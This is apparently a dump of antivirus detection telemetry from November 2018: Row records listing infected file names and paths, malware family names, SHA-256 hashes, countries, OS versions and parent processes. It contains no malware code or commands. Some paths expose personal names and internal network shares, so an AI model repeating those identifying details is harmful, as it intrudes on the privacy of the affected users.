  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053754-6aa1a460', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053754-6AA1A460', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054144-f3d46dc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054144-F3D46DC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053304-bdfa4853', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053304-BDFA4853', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060735-8ff1eb61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060735-8FF1EB61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062357-d9ab7afc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062357-D9AB7AFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054306-249ca0e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054306-249CA0E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hpusbfw.exe', filepath='\\\\?\\J:\\لتنزيل الويندوز على فلاشة\\ASD.Win.Setup.1.0.Beta.7.AhMeD00FaWzY\\files\\tools\\HPUSBFW.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1ca878d3d78fd8acaa7a72d23489d9dd2b698228845ce283eaea73313d6d5e5c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='report_lpa_a.scr', filepath='D:\\DATA_SHARE\\program\\hrd_audit(LPA)\\report_lpa_a\\report_lpa_a.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\NVIDIA Corporation\\Update Core\\NvBackend.exe', parentsize=2655520, timestamp='2018-11-01T00:38:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mei0413.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\MEI0413\\MEI0413.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160029-ef04ee4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160029-EF04EE4C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155800-d5ed6970', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155800-D5ED6970', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='27c83018c2f03aa4d3280aac2fda41f82755a36ac3c04b2d3c86372921781ea9', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T19:28:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='45e2f2defabfe8f2ff98ccd80603931581a31515fe0588da4b59d79160f9fef0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\45E2F2DEFABFE8F2FF98CCD80603931581A31515FE0588DA4B59D79160F9FEF0', filesize=176000, name='HTML/Infected.WebPage.Gen2.#M1.#R1'), hash='45e2f2defabfe8f2ff98ccd80603931581a31515fe0588da4b59d79160f9fef0', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:27:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='first aid 2014.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\LPA FIRST AID 2014\\FIRST AID 2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155551-c048fa25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155551-C048FA25', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T03:27:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rpg hira.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\new\\dokumentasi rpg HIRA\\rpg HIRA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sysprep.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\sv_daily.1\\Software\\OLD\\HP - Simulator\\Training Simulator\\18406- LAB Files\\ClassFiles\\Sysprep\\sysprep.exe', filesize=192000, name='W32/Sality.Y.#M1.#R1'), hash='4a964ebc488535678b61481ca220853d38ebc8ebceed96133d900cb0c73f75aa', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T11:49:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:00:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155630-c6eb1a1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155630-C6EB1A1C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sndvol.exe', filepath='F:\\Windows\\System32\\SndVol.exe', filesize=768000, name='W32/Sality.AG.#M1.#R1'), hash='45d8128215ca763012aca9d3755bfd493a70592c95257debe73190393c1883c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:45:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apr0413.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\APR0413\\APR0413.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:41:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhbcd3', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHBCD3', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:32:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175544-73c0c25d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16b55ae7\\AVSCAN-20181101-175517-7042858D\\AVSCAN-20181101-175544-73C0C25D', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:55:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmiadap.exe', filepath='C:\\Windows\\System32\\wbem\\WMIADAP.exe', filesize=128000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='999113aee6783853d56f3aa40bd524fc567df553aec310c797193704219930d7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:46:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111032-f7540c05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111032-F7540C05', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.mobisystems.office.exe', filepath='G:\\Android\\data\\com.mobisystems.office.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162833-dc5de65a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb0b97ab\\AVSCAN-20181101-162101-A35BC612\\AVSCAN-20181101-162833-DC5DE65A', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0155595.dll', filepath='g:\\system volume information\\_restore{98857453-17a4-42b1-8085-e71e507860ed}\\rp82\\A0155595.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='553373c83885d2881f84dda86811e62ccb2c666cdfd37135b8d126f778a1a711', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:25:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110917-edcadf37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110917-EDCADF37', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline='rtp', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903728, timestamp='2018-11-01T21:23:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nseA479.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=17074688, timestamp='2018-11-01T14:51:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191950-9cb0cc27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-191912-98CE9786\\AVSCAN-20181101-191950-9CB0CC27', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nscDCFB.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T04:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='алексей.scr', filepath='D:\\Алексей\\Алексей.scr', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\WASHIN SSS\\SSS2010\\WASHIN  APRIL2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='95cf86a9e1e52d79cc0f925bac2d86466933d3d53a76ece4a8e6d1b91d4d9190', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:52:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='89c73927-8df3-70d0-d3d6-dc4dc6b216c7.exe', filepath='h:\\{a801b005-a58e-a19f-7fcb-11c59cdaf409}\\89c73927-8df3-70d0-d3d6-dc4dc6b216c7.exe', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:25:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142101-acf6ed12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142101-ACF6ED12', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111508-1a2285b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111508-1A2285B5', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='basireps.exe', filepath='\\\\?\\C:\\FullProf_Suite\\basireps.exe', filesize=1344000, name='HEUR/APC.#M1.#R1'), hash='e1eac262ab8ceb62f2461b4f450c4f579266690fb435b3826e259cfe48358f43', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath='K:\\HBCD\\Programs\\DELETEJOBPRINTER.EXE', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144139-10664d79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-143952-099126A6\\AVSCAN-20181101-144139-10664D79', filesize=1728000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8ef95d133c9a034779aba772a4f9c23fb63962a2c2dbb82063dda2d7a21d4ed5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111221-05018cec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111221-05018CEC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='new3ouw8mpn.htm', filepath='C:\\Windows.old\\Users\\CP\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\J0DWFXI3\\new3OUW8MPN.htm', filesize=248000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='563533b036cd484ca3af0db629eb68d687a7e065d3bd5eb236ec6825fb1198ce', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T17:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173410-a710dd9d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-173410-A710DD9D', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:34:09Z'), dt=datetime.date(2018, 11, 1)),
